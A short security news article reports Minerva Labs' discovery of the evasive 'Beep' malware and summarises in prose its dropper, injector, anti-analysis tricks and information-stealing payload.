Cybersecurity researchers have unearthed a new piece of evasive malware dubbed Beep that’s designed to fly under the radar and drop additional payloads onto a compromised host.
“It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find,” Minerva Labs researcher Natalie Zargarov said.
“One such technique involved delaying execution through the use of the Beep API function, hence the malware’s name.”
Beep comprises three components, the first of which is a dropper that’s responsible for creating a new Windows Registry key and executing a Base64-encoded PowerShell script stored in it.
The PowerShell script, for its part, reaches out to a remote server to retrieve an injector, which, after confirming it’s not being debugged or launched in a virtual machine, extracts and launches the payload via a technique called process hollowing.
The payload is an information stealer that’s equipped to collect and exfiltrate system information and enumerate running processes. Other instructions the malware is capable of accepting from a command-and-control (C2) server include the ability to execute DLL and EXE files.